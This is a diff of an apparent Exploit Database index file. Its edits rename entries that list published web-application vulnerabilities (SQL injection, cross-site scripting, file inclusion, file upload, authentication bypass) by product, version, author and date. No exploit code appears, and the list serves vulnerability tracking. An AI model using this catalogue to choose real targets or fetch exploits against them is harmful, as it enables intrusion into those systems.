37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0 37648,platforms/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0 37649,platforms/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 -37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 +37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' SQL Injection",2012-08-22,kallimero,php,webapps,0 37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 -37652,platforms/php/webapps/37652.txt,"KindEditor - 'name' Parameter Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 +37652,platforms/php/webapps/37652.txt,"KindEditor - 'name' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37653,platforms/php/webapps/37653.txt,"WordPress Plugin Rich Widget - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37654,platforms/php/webapps/37654.txt,"WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 -37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 +37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 - Persistent Cross-Site Scripting",2015-07-20,"Filippos Mastrogiannis",php,webapps,0 37662,platforms/multiple/webapps/37662.txt,"AirDroid iOS / Android / Win 3.1.3 - Persistent Exploit",2015-07-20,Vulnerability-Lab,multiple,webapps,0 37666,platforms/php/webapps/37666.txt,"Joomla! Component Helpdesk Pro < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80 -37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 -37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 -37675,platforms/php/webapps/37675.txt,"Joomla! Component Komento - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 +37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 +37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 +37675,platforms/php/webapps/37675.txt,"Joomla! Component Komento - 'cid' SQL Injection",2012-08-27,Crim3R,php,webapps,0 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 -37677,platforms/php/webapps/37677.txt,"WordPress Plugin Finder - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 +37677,platforms/php/webapps/37677.txt,"WordPress Plugin Finder - 'order' Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 37679,platforms/php/webapps/37679.txt,"LibGuides - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host - 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps,0 -37681,platforms/php/webapps/37681.txt,"WordPress Plugin Cloudsafe365 - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 +37681,platforms/php/webapps/37681.txt,"WordPress Plugin Cloudsafe365 - 'file' Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 37682,platforms/php/webapps/37682.txt,"WordPress Plugin Simple:Press Forum - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery",2015-07-24,hyp3rlinx,multiple,webapps,0 37687,platforms/php/webapps/37687.txt,"TomatoCart - 'example_form.ajax.php' Cross-Site Scripting",2012-08-30,HauntIT,php,webapps,0 37689,platforms/asp/webapps/37689.txt,"XM Forum - 'search.asp' SQL Injection",2012-08-30,Crim3R,asp,webapps,0 -37690,platforms/php/webapps/37690.txt,"Crowbar - 'file' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 +37690,platforms/php/webapps/37690.txt,"Crowbar - 'file' Multiple Cross-Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0 37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition - Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro - SQL Injection / Local File Inclusion",2012-09-03,AkaStep,php,webapps,0 -37694,platforms/php/webapps/37694.txt,"Wiki Web Help - 'configpath' Parameter Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 -37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injections",2012-09-04,AkaStep,php,webapps,0 +37694,platforms/php/webapps/37694.txt,"Wiki Web Help - 'configpath' Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 +37695,platforms/php/webapps/37695.txt,"Sciretech (Multiple Products) - Multiple SQL Injections",2012-09-04,AkaStep,php,webapps,0 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS - 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 37697,platforms/php/webapps/37697.txt,"PHPFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 37698,platforms/php/webapps/37698.txt,"Kayako Fusion - 'download.php' Cross-Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0 @@ -36365,7 +36366,7 @@ id,file,description,date,author,platform,type,port 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37754,platforms/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37948,platforms/php/webapps/37948.txt,"WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 -37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php path' Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 +37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php?path' Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0 @@ -36381,21 +36382,21 @@ id,file,description,date,author,platform,type,port 37784,platforms/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 37786,platforms/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,php,webapps,0 -37787,platforms/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 +37787,platforms/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 37789,platforms/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 -37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 +37790,platforms/php/webapps/37790.txt,"FBDj - 'id' SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0 -37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - 'id' Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 -37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS - special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 -37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 +37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - 'id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 +37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS - 'special.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 +37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - 'article.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 -37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' Parameter Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 -37945,platforms/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' Parameter URI redirection",2012-10-15,"Aung Khant",php,webapps,0 -37946,platforms/php/webapps/37946.txt,"WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 +37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 +37945,platforms/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 +37946,platforms/php/webapps/37946.txt,"WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 37801,platforms/hardware/webapps/37801.sh,"Sagemcom F@ST 3864 V2 - Get Admin Password",2015-08-17,"Cade Bull",hardware,webapps,0 37802,platforms/jsp/webapps/37802.html,"IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities",2012-09-15,MustLive,jsp,webapps,0 37804,platforms/php/webapps/37804.txt,"minimal Gallery - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-17,ayastar,php,webapps,0 -37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0 +37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' SQL Injection",2012-09-18,Crim3R,php,webapps,0 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0 37807,platforms/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 37809,platforms/php/webapps/37809.php,"Nuts CMS - PHP Remote Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 @@ -36412,13 +36413,13 @@ id,file,description,date,author,platform,type,port 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 37938,platforms/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 -38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 +38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 37833,platforms/php/webapps/37833.txt,"YCommerce - Multiple SQL Injections",2012-09-21,"Ricardo Almeida",php,webapps,0 37835,platforms/php/webapps/37835.html,"WordPress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 -37836,platforms/php/webapps/37836.txt,"WordPress Plugin Token Manager - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 +37836,platforms/php/webapps/37836.txt,"WordPress Plugin Token Manager - 'tid' Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 37837,platforms/php/webapps/37837.html,"WordPress Plugin Sexy Add Template - Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 -37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 +37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,php,webapps,9999 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 @@ -36426,9 +36427,9 @@ id,file,description,date,author,platform,type,port 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 37892,platforms/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 -37896,platforms/php/webapps/37896.txt,"WordPress Plugin ABC Test - 'id' Parameter Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 +37896,platforms/php/webapps/37896.txt,"WordPress Plugin ABC Test - 'id' Cross-Site Scripting",2012-09-26,"Scott Herbert",php,webapps,0 37899,platforms/php/webapps/37899.txt,"Switchvox - Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0 -37901,platforms/php/webapps/37901.txt,"AlamFifa CMS - 'user_name_cookie' Parameter SQL Injection",2012-09-30,L0n3ly-H34rT,php,webapps,0 +37901,platforms/php/webapps/37901.txt,"AlamFifa CMS - 'user_name_cookie' SQL Injection",2012-09-30,L0n3ly-H34rT,php,webapps,0 37902,platforms/php/webapps/37902.php,"WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0 37903,platforms/php/webapps/37903.txt,"ZenPhoto - 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",php,webapps,0 37904,platforms/php/webapps/37904.txt,"Omnistar Mailer - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0 @@ -36444,28 +36445,28 @@ id,file,description,date,author,platform,type,port 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37934,platforms/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 -37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 +37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress Theme GeoPlaces3 - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37959,platforms/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,cr4wl3r,php,webapps,0 37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery - 'force-download.php' File Parameter Information Disclosure",2012-10-18,cr4wl3r,php,webapps,0 -37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - plist.php albumid Parameter SQL Injection",2012-10-18,cr4wl3r,php,webapps,0 -37962,platforms/php/webapps/37962.txt,"Amateur Photographer's Image Gallery - plist.php albumid Parameter Cross-Site Scripting",2012-10-18,cr4wl3r,php,webapps,0 -37963,platforms/php/webapps/37963.txt,"Amateur Photographer's Image Gallery - fullscreen.php albumid Parameter SQL Injection",2012-10-18,cr4wl3r,php,webapps,0 +37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' SQL Injection",2012-10-18,cr4wl3r,php,webapps,0 +37962,platforms/php/webapps/37962.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' Cross-Site Scripting",2012-10-18,cr4wl3r,php,webapps,0 +37963,platforms/php/webapps/37963.txt,"Amateur Photographer's Image Gallery - 'fullscreen.php?albumid' SQL Injection",2012-10-18,cr4wl3r,php,webapps,0 37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 37970,platforms/php/webapps/37970.html,"WordPress Plugin Wordfence Security - Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 37971,platforms/php/webapps/37971.html,"WHMCompleteSolution (WHMCS) 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 -37973,platforms/php/webapps/37973.txt,"SMF - 'view' Parameter Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 -37974,platforms/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injection",2012-10-26,G13,php,webapps,0 +37973,platforms/php/webapps/37973.txt,"SMF - 'view' Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 +37974,platforms/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injections",2012-10-26,G13,php,webapps,0 37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0 -37978,platforms/php/webapps/37978.txt,"Gramophone - 'rs' Parameter Cross-Site Scripting",2012-10-25,G13,php,webapps,0 +37978,platforms/php/webapps/37978.txt,"Gramophone - 'rs' Cross-Site Scripting",2012-10-25,G13,php,webapps,0 37979,platforms/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,php,webapps,0 37982,platforms/hardware/webapps/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,webapps,0 37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 37989,platforms/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,php,webapps,0 37991,platforms/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0 -37992,platforms/php/webapps/37992.txt,"CorePlayer - 'callback' Parameter Cross-Site Scripting",2012-10-28,MustLive,php,webapps,0 +37992,platforms/php/webapps/37992.txt,"CorePlayer - 'callback' Cross-Site Scripting",2012-10-28,MustLive,php,webapps,0 37993,platforms/php/webapps/37993.txt,"Joomla! Component com_quiz - SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0 37994,platforms/php/webapps/37994.txt,"NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) - 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 @@ -36476,67 +36477,67 @@ id,file,description,date,author,platform,type,port 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 38007,platforms/php/webapps/38007.txt,"DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0 -38008,platforms/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 +38008,platforms/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0 -38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 -38012,platforms/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 +38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 +38012,platforms/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager - (AWCM) cookie_gen.php Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 -38017,platforms/php/webapps/38017.txt,"WordPress Theme Kakao - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 -38018,platforms/php/webapps/38018.txt,"WordPress Plugin PHP Event Calendar - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 -38019,platforms/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 -38022,platforms/php/webapps/38022.txt,"WordPress Theme Dailyedition-mouss - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 -38023,platforms/php/webapps/38023.txt,"WordPress Plugin Tagged Albums - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38017,platforms/php/webapps/38017.txt,"WordPress Theme Kakao - 'ID' SQL Injection",2012-11-09,sil3nt,php,webapps,0 +38018,platforms/php/webapps/38018.txt,"WordPress Plugin PHP Event Calendar - 'cid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38019,platforms/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38022,platforms/php/webapps/38022.txt,"WordPress Theme Dailyedition-mouss - 'id' SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38023,platforms/php/webapps/38023.txt,"WordPress Plugin Tagged Albums - 'id' SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 -38025,platforms/php/webapps/38025.txt,"Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 -38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 +38025,platforms/php/webapps/38025.txt,"Omni-Secure - 'dir' Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 +38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' SQL Injection",2012-11-16,unsuprise,php,webapps,0 38027,platforms/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,php,webapps,80 38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Authentication Bypass",2015-08-31,smash,hardware,webapps,80 38030,platforms/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps,0 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38039,platforms/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 -38040,platforms/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 -38041,platforms/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 -38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injections",2012-11-21,"High-Tech Bridge",php,webapps,0 -38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter Cross-Site Scripting",2012-11-21,"High-Tech Bridge",php,webapps,0 +38040,platforms/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 +38041,platforms/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 +38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple SQL Injections",2012-11-21,"High-Tech Bridge",php,webapps,0 +38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-11-21,"High-Tech Bridge",php,webapps,0 38044,platforms/php/webapps/38044.txt,"Feng Office - Security Bypass / HTML Injection",2012-11-21,Ur0b0r0x,php,webapps,0 38045,platforms/php/webapps/38045.html,"XiVO - Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps,0 -38046,platforms/php/webapps/38046.txt,"WordPress Plugin Zingiri Web Shop - 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 -38047,platforms/php/webapps/38047.txt,"WordPress Plugin Webplayer - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 -38048,platforms/php/webapps/38048.txt,"WordPress Plugin Plg Novana - 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 +38046,platforms/php/webapps/38046.txt,"WordPress Plugin Zingiri Web Shop - 'path' Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 +38047,platforms/php/webapps/38047.txt,"WordPress Plugin Webplayer - 'id' SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38048,platforms/php/webapps/38048.txt,"WordPress Plugin Plg Novana - 'id' SQL Injection",2012-11-22,sil3nt,php,webapps,0 